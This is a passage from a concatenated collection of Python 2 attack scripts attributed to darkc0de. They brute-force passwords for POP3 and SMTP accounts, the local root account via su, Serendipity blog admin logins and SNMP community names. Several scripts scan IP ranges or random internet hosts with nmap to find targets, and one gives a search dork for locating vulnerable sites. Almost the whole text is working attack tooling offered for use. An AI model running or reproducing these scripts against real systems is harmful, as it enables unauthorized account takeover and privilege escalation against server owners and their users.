reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
return value[0][:-1], users[0][:-1]
class Worker(threading.Thread):
def run(self):
value, user = getword()
try:
print "-"*12
print "User:",user,"Password:",value
pop = poplib.POP3(sys.argv[1])
pop.user(user)
pop.pass_(value)
print "\t\nLogin successful:",value, user
print pop.stat()
pop.quit()
work.join()
sys.exit(2)
except (poplib.error_proto), msg:
#print "An error occurred:", msg
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
================================================
FILE: popbrute_iprange.py
================================================
#!usr/bin/python
#Pop3 Brute Forcer, searches ip_range for hosts using pop3.
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, StringIO, commands, random, sys, poplib, re
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./popbrute_iprange.py "
sys.exit(1)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com popBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Scanning:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
wordlist = copy(words)
def scan():
iprange = sys.argv[1]
ip_list = []
nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+iprange+' -p 110 | grep open -B 3')[1]).readlines()
for tmp in nmap:
ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
if ipaddr:
ip_list.append(ipaddr[0])
return ip_list
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
reloader()
value = random.sample(words, 1)
lock.release()
return value[0][:-1]
class Workhorse(threading.Thread):
def run(self):
value = getword()
try:
print "-"*12
print "User:",user[:-1],"Password:",value
pop = poplib.POP3(ip)
pop.user(user[:-1])
pop.pass_(value)
print "\t\nLogin successful:",value, user
print pop.stat()
pop.quit()
work.join()
sys.exit(2)
except(poplib.error_proto), msg:
#print "An error occurred:", msg
pass
ip_list = scan()
print "[+] Hosts Loaded:",len(ip_list),"\n"
for ip in ip_list:
try:
pop = poplib.POP3(ip)
welcome = pop.getwelcome()
pop.quit()
except (poplib.error_proto):
welcome = "No Response"
pass
print "\n\tAttempting BruteForce:",ip,"\n"
print "Server Response:",welcome,"\n"
for user in users:
for i in range(len(words)):
if i == 0: reloader()
work = Workhorse()
work.start()
time.sleep(1)
================================================
FILE: popbrute_random.py
================================================
#!usr/bin/python
#Uses nmap to check if pop3 port is open, brute forces if it is.
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, StringIO, commands, random, sys, poplib, re, socket
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./popbrute.py "
sys.exit(1)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com popBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Scanning:",sys.argv[1],"hosts"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def scan():
nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 -iR 1 -p 110 | grep open -B 3')[1]).readlines()
for tmp in nmap:
ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
if ipaddr:
return ipaddr
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0][:-1]
class Workhorse(threading.Thread):
def run(self):
value = getword()
try:
print "-"*12
print "User:",user[:-1],"Password:",value
pop = poplib.POP3(ipaddr[0])
pop.user(user[:-1])
pop.pass_(value)
print "\t\nLogin successful:",value, user
print pop.stat()
pop.quit()
work.join()
sys.exit(2)
except(poplib.error_proto, socket.gaierror, socket.error, socket.herror), msg:
#print "An error occurred:", msg
pass
for x in range(int(sys.argv[1])):
print "Scanning:",x,"of",sys.argv[1]
ipaddr = scan()
if ipaddr != None:
try:
pop = poplib.POP3(ipaddr[0])
welcome = pop.getwelcome()
pop.quit()
except (poplib.error_proto, socket.gaierror, socket.error, socket.herror):
welcome = "No Response"
pass
print "\n\tAttempting BruteForce:",ipaddr[0],"\n"
print "Server Response:",welcome,"\n"
for user in users:
for i in range(len(words)):
if i == 0: reloader()
work = Workhorse()
work.start()
time.sleep(2)
================================================
FILE: rootbrute.py
================================================
#!/usr/bin/python
#Local Root BruteForcer
#More Info: http://forum.darkc0de.com/index.php?action=vthread&forum=8&topic=1571
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import sys
try:
import pexpect
except(ImportError):
print "\nYou need the pexpect module."
print "http://www.noah.org/wiki/Pexpect\n"
sys.exit(1)
#Change this if needed.
LOGIN_ERROR = 'su: incorrect password'
def brute(word):
print "Trying:",word
child = pexpect.spawn ('su')
child.expect ('Password: ')
child.sendline (word)
i = child.expect (['.+\s#\s',LOGIN_ERROR])
if i == 0:
print "\n\t[!] Root Password:",word
child.sendline ('whoami')
print child.before
child.interact()
#if i == 1:
#print "Incorrect Password"
if len(sys.argv) != 2:
print "\nUsage : ./rootbrute.py "
print "Eg: ./rootbrute.py words.txt\n"
sys.exit(1)
try:
words = open(sys.argv[1], "r").readlines()
except(IOError):
print "\nError: Check your wordlist path\n"
sys.exit(1)
print "\n[+] Loaded:",len(words),"words"
print "[+] BruteForcing...\n"
for word in words:
brute(word.replace("\n",""))
================================================
FILE: serenbf.py
================================================
#!/usr/bin/python
#Serendipity Brute Force (serendipity_admin.php) POC
#Dork: "Powered by Serendipity" inurl:serendipity_admin.php
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib
print "\n d3hydr8[at]gmail[dot]com SerenBF v1.0"
print "----------------------------------------------"
if len(sys.argv) != 4:
print "Usage: ./serenbf.py \n"
sys.exit(1)
if sys.argv[1][:7] != "http://":
host = "http://"+sys.argv[1]
else:
host = sys.argv[1]
print "[+] BruteForcing:",host
print "[+] User:",sys.argv[2]
try:
words = open(sys.argv[3], "r").readlines()
print "[+] Words Loaded",len(words),"\n"
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
for word in words:
login_form_seq = [
('serendipity[action]', 'admin'),
('serendipity[user]', sys.argv[2]),
('serendipity[pass]', word[:-1]),
('serendipity[auto]', 'on'),
('submit', 'Login >')]
login_form_data = urllib.urlencode(login_form_seq)
try:
req = urllib2.Request(url=host, data=login_form_data)
site = urllib2.urlopen(req).read()
except(urllib2.URLError):
site = ""
pass
#Change this response if different. (language)
if re.search("invalid username or password",site):
print "[-] Login Failed:",word[:-1]
else:
print "\n\t[!] Login Successfull:",sys.argv[2],word
sys.exit(1)
print "\n[-] Brute Complete\n"
================================================
FILE: smtpbrute.py
================================================
#!usr/bin/python
#Smtp Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, smtplib, socket
from smtplib import SMTP
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./smtpbrute.py "
sys.exit(1)
try:
helo = smtplib.SMTP(sys.argv[1])
name = helo.helo()
helo.quit()
except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException):
name = "Server doesn't support the Helo cmd"
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com smtpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+] Helo message:",name,"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
return value[0][:-1], users[0][:-1]
class Worker(threading.Thread):
def run(self):
value, user = getword()
try:
print "-"*12
print "User:",user,"Password:",value
smtp = smtplib.SMTP(sys.argv[1])
smtp.login(user, value)
print "\t\nLogin successful:",user, value
smtp.quit()
work.join()
sys.exit(2)
except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException), msg:
#print "An error occurred:", msg
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
================================================
FILE: smtpbrute_iprange.py
================================================
#!usr/bin/python
#Smtp Brute Forcer, searches ip_range for hosts using smtp.
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, StringIO, commands, random, sys, smtplib, re, socket
from smtplib import SMTP
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./smtpbrute_iprange.py "
sys.exit(1)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com smtpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Scanning:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
wordlist = copy(words)
def scan():
iprange = sys.argv[1]
ip_list = []
nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+iprange+' -p 25 | grep open -B 3')[1]).readlines()
for tmp in nmap:
ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
if ipaddr:
ip_list.append(ipaddr[0])
return ip_list
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
reloader()
value = random.sample(words, 1)
lock.release()
return value[0][:-1]
class Workhorse(threading.Thread):
def run(self):
value = getword()
try:
print "-"*12
print "User:",user[:-1],"Password:",value
smtp = smtplib.SMTP(ip)
smtp.login(user[:-1], value)
print "\t\nLogin successful:",user, value
smtp.quit()
work.join()
sys.exit(2)
except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException), msg:
#print "An error occurred:", msg
pass
ip_list = scan()
print "[+] Hosts Loaded:",len(ip_list),"\n"
for ip in ip_list:
print "\n\tAttempting BruteForce:",ip,"\n"
try:
helo = smtplib.SMTP(ip)
print helo.helo(), "\n"
helo.quit()
except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException):
print "Server doesn't support the Helo cmd"
for user in users:
for i in range(len(words)):
if i == 0: reloader()
work = Workhorse()
work.start()
time.sleep(2)
================================================
FILE: smtpbrute_random.py
================================================
#!usr/bin/python
#Uses nmap to check if smtp port is open, brute forces if it is.
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, StringIO, commands, random, sys, smtplib, re, socket
from smtplib import SMTP
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./smtpbrute_random.py "
sys.exit(1)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com smtpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Scanning:",sys.argv[1],"hosts"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def scan():
nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 -iR 1 -p 25 | grep open -B 3')[1]).readlines()
for tmp in nmap:
ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
if ipaddr:
return ipaddr
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0][:-1]
class Workhorse(threading.Thread):
def run(self):
value = getword()
try:
print "-"*12
print "User:",user[:-1],"Password:",value
smtp = smtplib.SMTP(ipaddr[0])
smtp.login(user[:-1], value)
print "\t\nLogin successful:",user, value
smtp.quit()
work.join()
sys.exit(2)
except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException), msg:
#print "An error occurred:", msg
pass
for x in range(int(sys.argv[1])):
print "Scanning:",x,"of",sys.argv[1]
ipaddr = scan()
if ipaddr != None:
print "\n\tAttempting BruteForce:",ipaddr[0],"\n"
try:
helo = smtplib.SMTP(ipaddr[0])
print helo.helo(),"\n"
helo.quit()
except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException):
print "Server doesn't support the Helo cmd\n"
for user in users:
for i in range(len(words)):
if i == 0: reloader()
work = Workhorse()
work.start()
time.sleep(2)
================================================
FILE: snmp_brute.py
================================================
#!usr/bin/python
#Uses nmap to check if snmp port is open then uses snmpwalk to try and bruteforce
#the community name.
#Required: nmap and snmpwalk
#Changelog: added iprange, single scans and threading for random scans
#Changelog: added the ability to add your own wordlist, it will add to
#the ones given and erase the duplicates
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import time, StringIO, commands, sys, re, threading, sets
def timer():
now = time.localtime(time.time())
return time.asctime(now)
def title():
print "\n\t d3hydr8[at]gmail[dot]com snmpBruteForcer v1.2"
print "\t--------------------------------------------------\n"
def scan(option):
nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+option+' -p 161 | grep open -B 3')[1]).read()
if re.search("command not found",nmap.lower()):
print "\n[-] nmap not installed!!!\n"
sys.exit(1)
else:
ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", nmap)
if ipaddr:
return ipaddr
def brute(ip):
print "\n[+] Attempting BruteForce:",ip
try:
for n in names:
response = StringIO.StringIO(commands.getstatusoutput('snmpwalk '+ip+" "+n)[1]).readlines()
if re.search("command not found",response[0].lower()):
print "\n[-] snmpwalk not installed!!!\n"
sys.exit(1)
else:
if verbose ==1:
print "\t{- Trying:",n
if len(response) > 1:
print "\n\tSuccess:",ip,"Community Name:",n
print "\n\tTry: snmpwalk",ip,n,"\n"
except(), msg:
#print "Error:",msg
pass
class Worker(threading.Thread):
def run(self):
ipaddr = scan("-iR 1")
if ipaddr != None:
for ip in ipaddr:
brute(ip)
if len(sys.argv) <= 2:
title()
print "Usage: ./snmp_random.py